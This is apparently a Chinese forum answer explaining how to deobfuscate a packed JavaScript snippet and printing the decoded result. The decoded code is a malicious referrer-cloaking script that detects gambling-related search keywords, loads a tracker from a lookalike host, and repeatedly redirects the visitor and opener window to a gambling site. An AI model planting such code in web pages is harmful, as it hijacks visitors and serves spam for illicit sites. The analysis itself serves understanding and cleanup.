解密方法,将eval替换为console.log,然后将修改后的全部内容复制都Chrome控制台中
解密结果
function Redirect() {parent.window.opener.location = "http://www0.dangci999.com/"
}
var d = document.referrer
if ((d.indexOf("%B7%D1") > 0) || (d.indexOf("%E5%A8%B1%E4%B9%90%E5%9F%8E") > 0) || (d.indexOf("%BF%AA%BB%A7") > 0) || (d.indexOf("%E8%B5%8C%E5%8D%9A") > 0) || (d.indexOf("%E5%A8%B1%E4%B9%90") > 0) || (d.indexOf("%E5%8D%9A%E5%BD%A9") > 0) || (d.indexOf("%E7%99%BE%E5%AE%B6%E4%B9%90") > 0) || (d.indexOf("%E5%85%A8%E8%AE%AF%E7%BD%91") > 0) || (d.indexOf("%E7%9A%87%E5%86%A0") > 0) || (d.indexOf("%E6%80%BB%E7%BB%9F%E5%A8%B1%E4%B9%90%E5%9F%8E") > 0) || (d.indexOf("%E6%B5%B7%E7%8E%8B%E6%98%9F") > 0) || (d.indexOf("%E6%BE%B3%E9%97%A8%E8%B5%8C%E5%9C%BA") > 0) || (d.indexOf("%E8%B5%8C%E5%9C%BA") > 0) || (d.indexOf("%E6%8A%95%E6%B3%A8") > 0) || (d.indexOf("%e8%b5%8c") > 0) || (d.indexOf("%E9%AA%B0%E5%AE%9D") > 0) || (d.indexOf("%e5%8d%9a%e5%bd%a9") > 0) || (d.indexOf("%e6%a3%8b%e7%89%8c") > 0) || (d.indexOf("%E5%A8%B1%E4%B9%90%E5%9F%8E") > 0) || (d.indexOf("%e7%9c%9f%e4%ba%ba") > 0) || (d.indexOf("%e7%9c%9f%e9%92%b1") > 0) || (d.indexOf("%e7%8e%b0%e9%87%91") > 0) || (d.indexOf("%e5%bc%80%e6%88%b7") > 0) || (d.indexOf("%e5%bd%a9%e9%87%91") > 0) || (d.indexOf("%e6%8f%90%e7%8e%b0") > 0) || (d.indexOf("%e5%a4%aa%e9%98%b3%e5%9f%8e") > 0) || (d.indexOf("%e4%bd%93%e9%aa%8c%e9%87%91") > 0) || (d.indexOf("%E8%B6%B3%E7%90%83") > 0) || (d.indexOf("%E6%8A%95%E6%B3%A8") > 0) || (d.indexOf("%E8%B6%B3%E5%BD%A9") > 0) || (d.indexOf("%E7%99%BE%E5%AE%B6%E4%B9%90") > 0) || (d.indexOf("%E6%96%97%E5%9C%B0%E4%B8%BB") > 0) || (d.indexOf("%E8%BD%AE%E7%9B%98") > 0) || (d.indexOf("%E6%B3%A2%E9%9F%B3") > 0) || (d.indexOf("bbin") > 0) || (d.indexOf("%B6%C4%C7%F2") > 0) || (d.indexOf("%E6%B8%B8%E6%88%8F") > 0) || (d.indexOf("%E7%BC%85%E7%94%B8") > 0) || (d.indexOf("%E8%8F%B2%E5%BE%8B%E5%AE%BE") > 0) || (d.indexOf("bet") > 0) || (d.indexOf("%E5%88%A9%E6%9D%A5") > 0) || (d.indexOf("%E5%9B%BD%E9%99%85") > 0) || (d.indexOf("%E9%A2%9D%E5%BA%A6") > 0) || (d.indexOf("%E6%A3%8B%E7%89%8C") > 0) || (d.indexOf("%E9%BA%BB%E5%B0%86") > 0) || (d.indexOf("%E6%89%93%E7%89%8C") > 0) || (d.indexOf("%E6%96%97%E5%9C%B0%E4%B8%BB") > 0)) //判断指定关键词URL16进制加密
{
document.write('<script src="http://s17.cnzz.com.so/stat.js?id=3876164&web_id=3876164" language="JavaScript"></script>') //流量统计
document.writeln("<script>window.location.href=\'//www1.dangci999.com\'</script>.")
document.writeln("<div style='display:none'>")
setInterval("Redirect()", 1) //执行Redirect函数,打开延时单位毫秒
} else { //不满足指定关键词,载入原始网页
document.writeln("")
}
首先你的加密后的代码有误,无法执行,应将return(c35?String.fromCharCode(c+29):
修改为return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):
c和35之间的部分你没复制出来
这种加密的算法的解密方法很简单
<html><body>
<div id="test"></div>
<script type="text/javascript">
document.getElementById('test').innerHTML = 将需要破解的代码全部复制过来,注意你原来的代码不对,请通过替换先将上面说的那个错误改正
</script>
</body>
</html>
将上面的代码保存成html文件,打开此文件即可看到加密前的内容,由于你的问题解密后是广告语,所以不在此处给出,自己试一下
